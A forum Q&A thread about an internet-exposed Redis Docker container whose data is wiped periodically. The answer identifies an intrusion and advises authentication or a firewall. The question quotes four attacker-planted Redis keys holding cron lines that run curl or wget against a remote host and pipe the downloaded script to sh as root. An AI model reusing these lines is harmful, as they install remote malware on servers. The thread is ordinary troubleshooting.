0

I have a Redis running in docker, started with the command:

docker run -d --restart unless-stopped -p 6379:6379 redis/redis-stack-server:latest

However, all data inside the redis including the indexes are deleted every 30 minutes. I don't know why this happens.

Could it be because the VPS I'm running the docker is very limited on resources?

The VPS spec is 1 core CPU, 1 GB RAM & swap and 20 GB storage. OS is Ubuntu 22.04. The VPS provider is RackNerd. I have run the same docker-redis on a VPS with the same specification on OVH without any problem.

I'm running Redis on docker is because I want to use the Redisearch functionality.

Every few hours, keys named backup1 backup2 backup3 backup4 would appear in redis. Here's the value for each of the keys:

backup1 : */2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh backup2: */3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh backup3: */4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh backup4: */5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh

Here's the docker logs:

root@racknerd-d76c238:~# docker logs b4bb752bcda8 8:C 08 Jan 2025 04:51:49.757 # WARNING Memory overcommit must be enabled! Without it, a background save or replication may fail under low memory condition. Being disabled, it can also cause failures without low memory condition, see https://github.com/jemalloc/jemalloc/issues/1328. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect. 8:C 08 Jan 2025 04:51:49.759 * oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo 8:C 08 Jan 2025 04:51:49.759 * Redis version=7.4.1, bits=64, commit=00000000, modified=0, pid=8, just started 8:C 08 Jan 2025 04:51:49.759 * Configuration loaded 8:M 08 Jan 2025 04:51:49.761 * Increased maximum number of open files to 10032 (it was originally set to 1024). 8:M 08 Jan 2025 04:51:49.761 * monotonic clock: POSIX clock_gettime 8:M 08 Jan 2025 04:51:49.766 * Running mode=standalone, port=6379. 8:M 08 Jan 2025 04:51:49.768 * Module 'RedisCompat' loaded from /opt/redis-stack/lib/rediscompat.so 8:M 08 Jan 2025 04:51:49.790 * <search> Redis version found by RedisSearch : 7.4.1 - oss 8:M 08 Jan 2025 04:51:49.790 * <search> RediSearch version 2.10.5 (Git=2.10-e2f2 8a9) 8:M 08 Jan 2025 04:51:49.791 * <search> Low level api version 1 initialized successfully 8:M 08 Jan 2025 04:51:49.791 * <search> gc: ON, prefix min length: 2, min word length to stem: 4, prefix max expansions: 200, query timeout (ms): 500, timeout policy: return, cursor read size: 1000, cursor max idle (ms): 300000, max doctable size: 1000000, max number of search results: 10000, 8:M 08 Jan 2025 04:51:49.791 * <search> Initialized thread pools! 8:M 08 Jan 2025 04:51:49.793 * <search> Enabled role change notification 8:M 08 Jan 2025 04:51:49.793 * Module 'search' loaded from /opt/redis-stack/lib/redisearch.so 8:M 08 Jan 2025 04:51:49.804 * <timeseries> RedisTimeSeries version 11202, git_sha=5643fd4d6fcb1e9cf084fb2deb9285b08f4a6672 8:M 08 Jan 2025 04:51:49.805 * <timeseries> Redis version found by RedisTimeSeries : 7.4.1 - oss 8:M 08 Jan 2025 04:51:49.805 * <timeseries> loaded default CHUNK_SIZE_BYTES policy: 4096 8:M 08 Jan 2025 04:51:49.805 * <timeseries> loaded server DUPLICATE_POLICY: block 8:M 08 Jan 2025 04:51:49.805 * <timeseries> loaded default IGNORE_MAX_TIME_DIFF:0 8:M 08 Jan 2025 04:51:49.805 * <timeseries> loaded default IGNORE_MAX_VAL_DIFF:0.000000 8:M 08 Jan 2025 04:51:49.805 * <timeseries> Setting default series ENCODING to:compressed 8:M 08 Jan 2025 04:51:49.806 * <timeseries> Detected redis oss 8:M 08 Jan 2025 04:51:49.806 * Module 'timeseries' loaded from /opt/redis-stack/lib/redistimeseries.so 8:M 08 Jan 2025 04:51:49.816 * <ReJSON> Created new data type 'ReJSON-RL' 8:M 08 Jan 2025 04:51:49.818 * <ReJSON> version: 20803 git sha: unknown branch:unknown 8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V1 API 8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V2 API 8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V3 API 8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V4 API 8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V5 API 8:M 08 Jan 2025 04:51:49.819 * <ReJSON> Enabled diskless replication 8:M 08 Jan 2025 04:51:49.819 * Module 'ReJSON' loaded from /opt/redis-stack/lib/rejson.so 8:M 08 Jan 2025 04:51:49.819 * <search> Acquired RedisJSON_V5 API 8:M 08 Jan 2025 04:51:49.822 * <bf> RedisBloom version 2.8.2 (Git=unknown) 8:M 08 Jan 2025 04:51:49.823 * Module 'bf' loaded from /opt/redis-stack/lib/redi sbloom.so 8:M 08 Jan 2025 04:51:49.832 * <redisgears_2> Created new data type 'GearsType' 8:M 08 Jan 2025 04:51:49.835 * <redisgears_2> Detected redis oss 8:M 08 Jan 2025 04:51:49.838 # <redisgears_2> could not initialize RedisAI_InitError 8:M 08 Jan 2025 04:51:49.838 * <redisgears_2> Failed loading RedisAI API. 8:M 08 Jan 2025 04:51:49.838 * <redisgears_2> RedisGears v2.0.20, sha='9b737886bf825fe29ddc2f8da81f73cbe0b4e858', build_type='release', built_for='Linux-ubuntu2 2.04.x86_64', redis_version:'7.4.1', enterprise:'false'. 8:M 08 Jan 2025 04:51:49.881 * <redisgears_2> Registered backend: js. 8:M 08 Jan 2025 04:51:49.890 * Module 'redisgears_2' loaded from /opt/redis-stack/lib/redisgears.so 8:M 08 Jan 2025 04:51:49.891 * Server initialized 8:M 08 Jan 2025 04:51:49.892 * Ready to accept connections tcp 8:M 08 Jan 2025 05:04:19.697 * DB saved on disk 8:M 08 Jan 2025 05:04:20.167 * <redisgears_2> Got a flush started event 8:M 08 Jan 2025 05:04:20.172 * DB saved on disk 8:M 08 Jan 2025 05:04:21.850 * DB saved on disk 8:M 08 Jan 2025 05:04:22.318 * DB saved on disk 8:M 08 Jan 2025 05:04:22.565 * <redisgears_2> Got a flush started event 8:M 08 Jan 2025 05:04:22.568 * DB saved on disk 8:M 08 Jan 2025 05:04:24.255 * DB saved on disk 8:M 08 Jan 2025 05:04:24.965 * DB saved on disk 8:M 08 Jan 2025 05:11:27.270 * <module> Scanning index idx:delivery in background 8:M 08 Jan 2025 05:11:27.270 * <module> Scanning index idx:delivery in background: done (scanned=0) 8:M 08 Jan 2025 05:11:27.270 * <module> Scanning index idx:ehailing in background 8:M 08 Jan 2025 05:11:27.271 * <module> Scanning index idx:ehailing in background: done (scanned=0) 8:M 08 Jan 2025 05:11:27.271 * <module> Scanning index idx:product in background 8:M 08 Jan 2025 05:11:27.271 * <module> Scanning index idx:product in background: done (scanned=0) 8:M 08 Jan 2025 05:46:37.355 * DB saved on disk 8:M 08 Jan 2025 05:46:37.746 * <redisgears_2> Got a flush started event 8:M 08 Jan 2025 05:46:37.750 * DB saved on disk 8:M 08 Jan 2025 05:46:39.517 * DB saved on disk 8:M 08 Jan 2025 05:46:39.910 * DB saved on disk 8:M 08 Jan 2025 05:46:40.104 * <redisgears_2> Got a flush started event 8:M 08 Jan 2025 05:46:40.107 * DB saved on disk 8:M 08 Jan 2025 05:46:41.466 * DB saved on disk 8:M 08 Jan 2025 05:46:42.050 * DB saved on disk 8:M 08 Jan 2025 06:21:30.817 * <module> Scanning index idx:business in background 8:M 08 Jan 2025 06:21:30.822 * <module> Scanning index idx:business in background: done (scanned=0) 8:M 08 Jan 2025 06:21:30.823 * <module> Scanning index idx:delivery in background 8:M 08 Jan 2025 06:21:30.825 * <module> Scanning index idx:delivery in background: done (scanned=0) 8:M 08 Jan 2025 06:21:30.826 * <module> Scanning index idx:ehailing in background 8:M 08 Jan 2025 06:21:30.827 * <module> Scanning index idx:ehailing in background: done (scanned=0) 8:M 08 Jan 2025 06:21:30.828 * <module> Scanning index idx:product in background 8:M 08 Jan 2025 06:21:30.831 * <module> Scanning index idx:product in background: done (scanned=0) 8:M 08 Jan 2025 06:46:43.095 * 1 changes in 3600 seconds. Saving... 8:M 08 Jan 2025 06:46:43.105 * Background saving started by pid 29 29:C 08 Jan 2025 06:46:43.123 * DB saved on disk 29:C 08 Jan 2025 06:46:43.124 * Fork CoW for RDB: current 0 MB, peak 0 MB, average 0 MB 8:M 08 Jan 2025 06:46:43.207 * Background saving terminated with success
Improve this question
4
  • Have you read the logs? Do they say anything? Commented Jan 8 at 6:55
  • @vidarlo I've added the docker logs Commented Jan 8 at 7:27
  • Why do you publish port 6379 on all host interfaces? Do you need external access to redis? Commented Jan 8 at 15:41
  • @BMitch I just followed the command from github.com/RediSearch/RediSearch Commented Jan 8 at 17:17

1 Answer 1

Reset to default
2

Congratulations, you're exposing redis on the internet, and someone has attacked it.

It's not your database server any more; someone is using it for their own purpose. You have to secure it, by configuring either strong authentication, or firewalling it so it's not accessible on the Internet.

Improve this answer
2
  • Googled en2an and this seems to be the case.. but may I know how it happens? Because this instance of redis is running on docker, and I just ran it using the command above. But before that, I installed redis on the VPS (not using docker), could it be the attacker got the access from the first redis installation? Commented Jan 8 at 14:15
  • You've not secured the installation in any way. You need to secure it, by enabling authentication or firewalling it. Firewalling it is probably the most sensible action. Commented Jan 8 at 15:05

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.